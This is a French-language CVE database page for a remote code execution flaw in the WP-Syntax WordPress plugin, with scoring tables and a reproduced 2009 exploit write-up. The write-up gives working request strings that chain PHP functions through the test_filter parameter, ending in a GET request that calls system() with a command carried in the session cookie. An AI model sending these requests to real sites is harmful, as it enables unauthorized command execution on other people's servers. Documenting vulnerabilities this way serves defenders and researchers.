CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
WP-Syntax plugin 0.9.1 and earlier for Wordpress, with register_globals enabled, allows remote attackers to execute arbitrary PHP code via the test_filter[wp_head] array parameter to test/index.php, which is used in a call to the call_user_func_array function.
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
6.8
AV:N/AC:M/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
4.19%
–
–
2022-04-03
–
–
4.19%
–
–
2022-07-17
–
–
4.19%
–
–
2023-03-12
–
–
–
1.1%
–
2023-08-06
–
–
–
1.1%
–
2024-01-07
–
–
–
1.35%
–
2024-02-11
–
–
–
1.35%
–
2024-02-18
–
–
–
1.64%
–
2024-03-31
–
–
–
2.03%
–
2024-06-02
–
–
–
2.03%
–
2024-06-02
–
–
–
2.03%
–
2025-01-19
–
–
–
2.03%
–
2025-03-18
–
–
–
–
2.19%
2025-03-18
–
–
–
–
2.19,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2009-08-26 22h00 +00:00 Auteur : Raz0r EDB Vérifié : Yes
============================================================
Wordpress Plugin WP-Syntax <= 0.9.1 Remote Command Execution
============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
WP-Syntax - This is the most popular plugin for wordpress to highlight
the code. It is used on many sites, such as Stefan Esser uses it on his
blog. For me this plugin is of interest, as found in his blog quite a
large farm-partnerki. Following an analysis of source code, I found
quite unusual vulnerability, therefore, decided to create a separate
topic. Probably somebody have comments or thoughts about a more elegant
solution.
WP-Syntax uses the library GeSHi, which implements all the functionality
to review the syntax and appropriate for each language html-code. Having
reviewed the main script plugin wp-syntax.php, I moved to the folder
test, where the 2 scripts: index.php and code.php. Code.php contains
code examples for different languages, and leads them to the index.php
illumination to demonstrate the capacity of the plug-in. Index.php
inkludit wp-syntax.php, which in turn connects geshi.php. According to
the developer wp-syntax.php can be called only in the context of WP,
while the test / index.php can be run independently of the platform, the
author decided to use samopalnoe WP likeness of a mechanism to implement
the callback-function. Who is familiar with the internal device, WP, or
at least see part of the code can understand what I am talking about
functions add_action (), do_action (), apply_filters (), etc.
Self-f-tion apply_filters as follows:
PHP code:
function apply_filters($tag, $string)
{
global $test_filter;
if (!isset($test_filter[$tag])) return $string;
uksort($test_filter[$tag], "strnatcasecmp");
foreach ($test_filter[$tag] as $priority => $functions)
{
if (is_null($functions)) continue;
foreach($functions as $function)
{
$string = call_user_func_array($function, array($string));
}
}
return $string;
}
Global array test_filter there has not previously initialized, so you
can add to the random elements, with register_globals = on and then
execute any function using call_user_func_array. In WP there is a
special t-tion - unregister_globals, protects against these
vulnerabilities, but another case - the script works outside the context
of WP.
apply_filters called in several places, one of them:
<html>
<head>
<title>WP-Syntax Test Page</title>
<link rel="stylesheet" href="../wp-syntax.css" type="text/css" media="screen" />
<?php
test_head();
/* ... */
function test_head()
{
echo apply_filters("wp_head", "");
}
?>
As we can see the complexity of the case is that you can not function
with arbitrary arguments - will be transferred to an empty argument of
type string. At first glance it seemed to me that even banal phpinfo ()
will not be able to perform because it only takes an argument of type
integer, or there is an error of level E_WARNING. However vniknuv the
logic of the F-apply_filters is clear that the argument for change
call_user_func_array () can be, because it runs in a loop and assigns
the result of his argument for the next callback-function. In other
words by means of a chain composed of functions could be to receive and
transmit the -1 value in phpinfo (-1 = INFO_ALL). Then I started
remembering all the functions of PHP, which could help me in this
situation. As it turned out many of the functions do not take arguments,
causing the error, if they give a blank value. Nevertheless, I need the
sequence of function calls was found:
http://localhost/wp/2.7/wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=pi&test_filter[wp_head][99][1]=cos&test_filter[wp_head][99][2]=phpinfo
First call the function pi (), returns the value of pi. Oddly, this
feature, despite the lack of arguments, it is an error "Wrong parameter
count for". Then comes the call to the function cos (), which is passed
the value of pi. As you know, cos (pi) = -1, so in the phpinfo ()
reaches the desired value and output data.
It seemed no longer to achieve, but I continue to seek ways to perform
arbitrary commands. It was necessary to find a function that returns
would be needed for my data. These data could be obtained from the
environment, but do not reach appropriate functions. However, the way
all the same was found =)
PHP code:
<?php
session_start("");
echo session_id();
echo session_id("");
echo session_id();
?>
It was found that the session_id returns last ID, despite the fact that
the function was transferred to the parameter. I do not know this bug or
not, but at the docks on that occasion said nothing. As a result, the
final query looks as follows:
F-tion session_id () can return a value as the current session ID, and
install it, if there was any argument. I obviously need to get value,
but how to deal with an empty parameter, which is constantly being
passed? I decided to check the return value of this script:
GET /wp/2.7/wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
Host: localhost
Cookie: PHPSESSID=dir
Connection: close
# ~ - [ [ : Inj3ct0r : ] ]
# milw0rm.com [2009-08-13]
Products Mentioned
Configuraton 0
Ryan.mcgeary>>Wp-syntax >> Version To (including) 0.9.1